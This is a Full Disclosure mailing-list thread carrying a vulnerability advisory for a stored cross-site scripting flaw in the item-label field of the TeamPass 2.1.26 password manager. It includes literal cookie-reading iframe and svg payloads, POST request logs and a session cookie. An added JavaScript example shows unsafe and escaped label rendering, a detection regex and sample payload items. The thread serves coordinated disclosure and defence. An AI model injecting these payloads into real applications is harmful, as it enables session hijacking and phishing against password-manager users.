Hi Ulisses,

The XSS found is a different one. The one mentioned on https://github.com/nilsteampassnet/TeamPass/issues/1244 has a screenshot where the XSS is inserted when creating a new role and by preventing the JavaScript filters from executing. A new role can only be created by the admin user. This XSS is also performed by inserting the <script> tag; this tag does not work in the newly found bug.
The newly found XSS (http://www.vulnerability-lab.com/get_content.php?id=1845) is inserted in the label field of an item; this can be done by any authenticated user that can create or edit an item. The XSS is executed as soon as a user opens the folder that contains the item with the XSS in the label field.

Peter

On 25-5-2016 at 13:05, Ulisses Montenegro wrote:
> This looks very similar to the persistent XSS reported a while ago on the
> Teampass github, is it the same vulnerability?
>
> https://github.com/nilsteampassnet/TeamPass/issues/1244
>
>
> On 25 May 2016 at 19:10, Vulnerability Lab <[email protected]>
> wrote:
>
>> Document Title:
>> ===============
>> Teampass v2.1.26 - Stored Cross Site Scripting Vulnerability
>>
>>
>> References (Source):
>> ====================
>> http://www.vulnerability-lab.com/get_content.php?id=1845
>>
>>
>> Release Date:
>> =============
>> 2016-05-24
>>
>>
>> Vulnerability Laboratory ID (VL-ID):
>> ====================================
>> 1845
>>
>>
>> Common Vulnerability Scoring System:
>> ====================================
>> 3.4
>>
>>
>> Product & Service Introduction:
>> ===============================
>> TeamPass is a password manager dedicated to managing passwords in a
>> collaborative way on any Apache, MySQL and PHP server.
>> It is especially designed to provide password access security for allowed
>> people. This makes TeamPass really useful in a
>> business/enterprise environment and provides IT or team managers with a
>> powerful and easy tool for customizing password
>> access depending on the user's role.
>>
>> (Copy of the Homepage: http://teampass.net/ )
>>
>>
>> Abstract Advisory Information:
>> ==============================
>> An independent vulnerability laboratory researcher discovered an
>> application-side cross site scripting vulnerability in the Teampass
>> v2.1.25/26 application.
>>
>>
>> Vulnerability Disclosure Timeline:
>> ==================================
>> 2016-05-17: Researcher Notification & Coordination (Peter Kok)
>> 2016-05-18: Vendor Notification (Teampass Security Team)
>> 2016-05-18: Vendor Response/Feedback (Teampass Security Team)
>> 2016-05-23: Vendor Fix/Patch (Teampass Developer Team)
>> 2016-05-24: Public Disclosure (Vulnerability Laboratory)
>>
>>
>> Discovery Status:
>> =================
>> Published
>>
>>
>> Affected Product(s):
>> ====================
>> Nils Laumaillé
>> Product: Teampass Password Manager - Online Service (Web-Application) 2.1.25
>>
>> Nils Laumaillé
>> Product: Teampass Password Manager - Online Service (Web-Application) 2.1.26
>>
>>
>> Exploitation Technique:
>> =======================
>> Remote
>>
>>
>> Severity Level:
>> ===============
>> Medium
>>
>>
>> Technical Details & Description:
>> ================================
>> An application-side cross site scripting web vulnerability has been
>> discovered in the official Teampass v2.1.26 web-application.
>> The vulnerability allows remote attackers to inject their own malicious script
>> code into the application-side of the vulnerable module or function.
>>
>> Teampass allows authenticated users to create items to store usernames,
>> passwords, descriptions, files and more. When creating or editing an
>> item, the very first field, the label field, is vulnerable to iframe
>> injection and XSS insertion. The iframe or cross site scripting will be
>> executed as soon as a user opens a folder. The attack vector is persistent
>> and the request method to inject is POST.
>>
>> The security risk of the application-side vulnerability is estimated as
>> medium with a CVSS (Common Vulnerability Scoring System) count of 3.4.
>> Exploitation of the persistent web vulnerability requires a low privileged
>> web-application user account and low or medium user interaction.
>> Successful exploitation of the vulnerability results in session hijacking,
>> persistent phishing attacks, persistent external redirects to
>> malicious sources and persistent manipulation of affected or connected
>> application modules.
>>
>> Request Method(s):
>> [+] POST
>>
>> Vulnerable Function(s):
>> [+] Add or Edit (Label)
>>
>> Vulnerable Parameter(s):
>> [+] label name
>>
>> Affected Module(s):
>> [+] Item Listing
>>
>>
>> Proof of Concept (PoC):
>> =======================
>> The persistent cross site scripting web vulnerability can be exploited by
>> remote attackers without a privileged web-application user account and low or
>> medium user interaction.
>> For security demonstration or to reproduce the vulnerability follow the
>> provided information and steps below to continue.
>>
>> Manual steps to reproduce the vulnerability ...
>> 1. Create or edit an item
>> 2. Change the first label name field to a script code payload
>>    Note: Vulnerability Lab"><iframe SRC="http://www.vulnerability-lab.com/" onload=alert(document.cookie)<></iframe> or
>>    <svg/onload=alert(document.cookie)>
>> 3. The execution occurs in the main label field output context value
>> 4. Successful reproduction of the application-side vulnerability!
>>
>>
>> --- PoC Session Logs [POST] ---
>> Status: 200[OK]
>> POST http://teampass.localhost:8080/index.php/pwd/aj_edit_save/73
>> Mime Type[application/json]
>> Request Header:
>> Host[teampass.localhost:8080]
>> User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0]
>> Accept[application/json, text/javascript, */*; q=0.01]
>> X-Requested-With[XMLHttpRequest]
>> Referer[http://teampass.localhost:8080/index.php/pwd/view/73]
>> Cookie[__utma=66503851.473320856.1464166381.1464166381.1464166381.1; PHPSESSID=s9iq39avpg0k5vjc896p0m5tb6]
>> Connection[keep-alive]
>> POST-Daten:
>> cproject_id[23]
>> password_id[73]
>> name[Dans+Linux+user+%22%3E%3C[SCRIPT CODE PAYLOAD INJECT VIA NAME LABEL!]%3E]
>> tags[]
>> hidden-tags[]
>> access_info[]
>> faketextdonotautofill1[]
>> username[dan]
>> faketextdonotautofill2[]
>> email[]
>> fakepwddonotautofill1[]
>> password[hello]
>> password_visible[hello]
>> fakepwddonotautofill2[]
>> repeat_password[hello]
>> repeat_password_visible[hello]
>> expiry_date_edit[]
>> notes[]
>> Response Header:
>> Date[Wed, 25 May 2016 08:53:48 GMT]
>> Server[Apache]
>> X-Powered-By[PHP/5.4.4-14+deb7u8]
>> Expires[Thu, 19 Nov 1981 08:52:00 GMT]
>> Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
>> Pragma[no-cache]
>> Content-Length[74]
>> Keep-Alive[timeout=5, max=99]
>> Connection[Keep-Alive]
>> Content-Type[application/json; charset=utf-8]
>> -
>> Status: 200[OK]
>> GET http://teampass.localhost:8080/index.php/checkss/n/pwd
>> Mime Type[text/html]
>> Request Header:
>> Host[teampass.localhost:8080]
>> User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0]
>> Accept[text/html, */*; q=0.01]
>> X-Requested-With[XMLHttpRequest]
>> Referer[http://teampass.localhost:8080/index.php/pwd/view/73]
>> Cookie[__utma=66503851.473320856.1464166381.1464166381.1464166381.1; __utmb=66503851.1.10.1464166381; PHPSESSID=s9iq39avpg0k5vjc896p0m5tb6]
>> Connection[keep-alive]
>> Response Header:
>> Date[Wed, 25 May 2016 08:53:49 GMT]
>> Server[Apache]
>> X-Powered-By[PHP/5.4.4-14+deb7u8]
>> Connection[Keep-Alive]
>> Content-Type[text/html]
>>
>>
>> Reference(s):
>> http://teampass.localhost:8080/
>> http://teampass.localhost:8080/index.php/
>> http://teampass.localhost:8080/index.php/pwd/
>> http://teampass.localhost:8080/index.php/checkss/
>> http://teampass.localhost:8080/index.php/checkss/n/
>> http://teampass.localhost:8080/index.php/checkss/n/pwd
>> http://teampass.localhost:8080/index.php/pwd/aj_edit_save/
>> http://teampass.localhost:8080/index.php/pwd/aj_edit_save/73
>>
>>
>> Security Risk:
>> ==============
>> The security risk of the application-side cross site scripting
>> vulnerability in the teampass application is estimated as medium. (CVSS 3.4)
>>
>>
>> Credits & Authors:
>> ==================
>> Peter Kok - [http://www.vulnerability-lab.com/show.php?user=Peter%20Kok]
>>
>>
>> Disclaimer & Information:
>> =========================
>> The information provided in this advisory is provided as it is without any
>> warranty. Vulnerability Lab disclaims all warranties, either expressed or
>> implied, including the warranties of merchantability and capability for a
>> particular purpose. Vulnerability-Lab or its suppliers are not liable in
>> any case of damage, including direct, indirect, incidental, consequential loss
>> of business profits or special damages, even if Vulnerability-Lab or its
>> suppliers have been advised of the possibility of such damages. Some states
>> do not allow the exclusion or limitation of liability for consequential or
>> incidental damages so the foregoing limitation may not apply. We do not
>> approve or encourage anybody to break any licenses, policies, deface
>> websites, hack into databases or trade with stolen data.
>>
>> Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
>> Contact: [email protected] - [email protected] - [email protected]
>> Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
>> Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
>> Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
>> Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
>>
>> Any modified copy or reproduction, including partial usage, of this
>> file requires authorization from Vulnerability Laboratory. Permission to
>> electronically redistribute this alert in its unmodified form is granted.
>> All other rights, including the use of other media, are reserved by
>> Vulnerability-Lab Research Team or its suppliers. All pictures, texts,
>> advisories, source code, videos and other information on this website are
>> trademarks of the vulnerability-lab team & the specific authors or managers.
>> To record, list, modify, use or edit our material contact (admin@ or
>> [email protected]) to ask permission.
>>
>> Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
>>
>>
>> --
>> VULNERABILITY LABORATORY - RESEARCH TEAM
>> SERVICE: www.vulnerability-lab.com
>> CONTACT: [email protected]
>>
>>
>> _______________________________________________
>> Sent through the Full Disclosure mailing list
>> https://nmap.org/mailman/listinfo/fulldisclosure
>> Web Archives & RSS: http://seclists.org/fulldisclosure/
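The thread describes a label value that is stored as-is and rendered live when a user opens the folder listing. The following is an added example, not TeamPass's own code: it contrasts the unsafe concatenation pattern with an output-encoded rendering of the label, and adds an audit over already-stored labels so a defender can find items injected before the fix. It assumes the listing is built client-side from a JSON item list, as the XHR/JSON exchange in the PoC log suggests; the `name` and `password_id` field names follow the aj_edit_save POST body, and the sample items are constructed.

```javascript
// Added example, not TeamPass code. Assumes the folder listing is built
// client-side from a JSON item list; field names follow the advisory's POST body.

// Encode the characters that change meaning in HTML text and attribute context.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable pattern: the stored label is concatenated into the row markup
// unchanged, so a label that closes the quote and opens a tag becomes live HTML.
function renderRowUnsafe(item) {
  return '<tr><td title="' + item.name + '">' + item.name + "</td></tr>";
}

// Hardened pattern: encode once, then place the value in both contexts.
function renderRowSafe(item) {
  const label = escapeHtml(item.name);
  return '<tr><td title="' + label + '">' + label + "</td></tr>";
}

function renderListingSafe(items) {
  return "<table>" + items.map(renderRowSafe).join("") + "</table>";
}

// Detection over stored data: a persistent injection lives in the database,
// so flag labels that contain a tag, an inline event handler or a javascript: URL
// and return their item ids for review.
const MARKUP_RE = /<\s*\/?\s*[a-z!]|\bon[a-z]+\s*=|javascript:/i;
function auditLabels(items) {
  return items.filter((item) => MARKUP_RE.test(item.name)).map((item) => item.password_id);
}

// Constructed sample items; 72 and 73 use the two payload shapes the advisory quotes.
const SAMPLE_ITEMS = [
  { password_id: 71, name: "Dans Linux user" },
  { password_id: 72, name: 'Lab"><iframe src="http://example.invalid/" onload=alert(1)></iframe>' },
  { password_id: 73, name: "<svg/onload=alert(1)>" },
];
```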
